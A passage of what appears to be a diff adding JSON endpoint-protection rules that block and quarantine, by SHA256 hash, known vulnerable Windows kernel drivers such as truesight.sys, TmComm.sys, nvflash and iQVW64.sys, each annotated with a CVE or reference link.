+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618116Z",
+ "creation_date": "2026-03-23T11:45:29.618118Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618123Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "747a4dc50915053649c499a508853a42d9e325a5eec22e586571e338c6d32465",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad651037-1a8f-5600-bd47-eac407208934",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981129Z",
+ "creation_date": "2026-03-23T11:45:29.981131Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981137Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5d7bfe05792189eaf7193bee85f0c792c33315cfcb40b2e62cc7baef6cafbc5c",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad67379c-3778-576e-b45c-6ffb795bbd94",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828076Z",
+ "creation_date": "2026-03-23T11:45:31.828078Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828084Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d200394680f969b902951bec3b04794f63b80feee6cbbf596a0dda1693153087",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad691297-4e28-5fd6-a59e-88e860c5c6b9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835555Z",
+ "creation_date": "2026-03-23T11:45:30.835557Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835563Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d2e56c0054d51b0a3a1493e2bcbe44abac80c783f31377c8896318f9177c3b0b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad75de23-ef40-5718-abc1-35a86666c845",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827125Z",
+ "creation_date": "2026-03-23T11:45:30.827127Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827132Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f5df280ce9d7e58d1c616dd31b791b6242e760dd08b0ba6ce0a75519ae4e3248",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad77415c-90d8-504d-9557-3afd64f3b62a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832297Z",
+ "creation_date": "2026-03-23T11:45:30.832299Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832304Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b39e438dd063696dcb010e39f49601c04b06e603c64b65fa5f1653ab0f31cff8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad7a00b0-f5cc-57f3-808f-b0b8755ba927",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972439Z",
+ "creation_date": "2026-03-23T11:45:29.972441Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972447Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1452103306895429c54ba1735800b8c8694c3165cdef32ca12ed6ce348019292",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad832e4c-6586-56c6-b747-6b353cc47f42",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145165Z",
+ "creation_date": "2026-03-23T11:45:31.145167Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145172Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "de7cbbcb95e3079eb3b7afc47410796ef072218ad844e00f154594d0bc9064e4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad846fc2-ae2d-5079-bb3f-848ec8817bc5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974836Z",
+ "creation_date": "2026-03-23T11:45:29.974837Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974843Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "44120b712e4b5ef3b302f03b7aa61f9f6fe6820d966addbcc43d8e09402e5906",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad8995f3-7069-5e4f-8a20-32bdb162412f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491831Z",
+ "creation_date": "2026-03-23T11:45:31.491833Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491839Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff2e6875b1946c037a15d4194e7c4e5551576236577b336997e590244141ff54",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad8e4eb7-a4aa-5402-a1e2-8fa34145a1da",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829027Z",
+ "creation_date": "2026-03-23T11:45:30.829029Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829034Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4f73a08257789f98459f92c48c8dca7bd1616fb568823f230f17d559c27aee22",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad8ee40f-268c-5b96-9c9d-2a2fd17d7e65",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621176Z",
+ "creation_date": "2026-03-23T11:45:29.621177Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621183Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c55b6620216c195ce24ef21e6ab7e181146fccf17c06606c4cd419fe3e45bd7",
+ "comment": "CoreTemp Physmem dangerous drivers (aka ALSYSIO64.sys) [https://www.loldrivers.io/drivers/4d365dd0-34c3-492e-a2bd-c16266796ae5/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad9142dd-5509-5c3d-857d-fb1db26fd67b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457245Z",
+ "creation_date": "2026-03-23T11:45:30.457248Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457257Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "198a4dc1c4bd7eff31ff4d1952a592170b25bfb5fedcd9d5d4c4fd3707337e42",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ada923e8-238a-54d0-bec6-ce48fff76c39",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973620Z",
+ "creation_date": "2026-03-23T11:45:29.973621Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973627Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4bc0921ffd4acc865525d3faf98961e8decc5aec4974552cbbf2ae8d5a569de4",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "adb46306-ea15-5618-b8d6-56f05297f3d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821236Z",
+ "creation_date": "2026-03-23T11:45:31.821239Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821247Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4f44b9c956a98d453454f79d91dbb4e8768d5b671e4a413609e2cd866778d872",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "adc71f6d-2bf8-54d6-bd6b-0adab8d56586",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973982Z",
+ "creation_date": "2026-03-23T11:45:29.973984Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973990Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c9014b03866bf37faa8fdb16b6af7cfec976aaef179fd5797d0c0bf8079d3a8c",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "adc740ca-4e15-5afe-88c0-66643cbde6ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618305Z",
+ "creation_date": "2026-03-23T11:45:29.618307Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618312Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df996d5a06a2e2ecc087569358b1957d500b176ec7ed37031bcee440963d9d80",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "adcfe4ca-e716-5ffb-91b4-a3b651fb7a61",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810558Z",
+ "creation_date": "2026-03-23T11:45:31.810560Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810565Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a1150b251622c9ae01cb7c1939f77de16a2543b37d3cb46271f3aadc314310f5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "addbaf10-deb3-55b8-b25b-3671ee03fd11",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833534Z",
+ "creation_date": "2026-03-23T11:45:30.833537Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833546Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "22e67a311baf7084390e9a1b32259f687b83cae75d6632be82ed8bf77a4facfe",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ade3e6ff-48cc-5ab3-a065-f8da63c5eedf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817742Z",
+ "creation_date": "2026-03-23T11:45:30.817745Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817753Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7c62a659a4f8fdecfd5a64f4f4391852996db564d123fc5d20e3f3dfb11ed62c",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "adedd4e1-a3ab-591a-ade1-5844e56399a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456076Z",
+ "creation_date": "2026-03-23T11:45:30.456079Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456088Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13d7c729c019c1c5a4b3e9fb27d1dd0b992fb7099f4314e011aafcb3472b7107",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "adfd0926-734c-5530-adc3-a93f0d39203c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145817Z",
+ "creation_date": "2026-03-23T11:45:31.145819Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145825Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "53ff5a5d249b46963193ad6ace0ad2eed3015f75c21f336a9356587a24626039",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae04f8e0-70d0-557b-8c0b-82a6429b5728",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
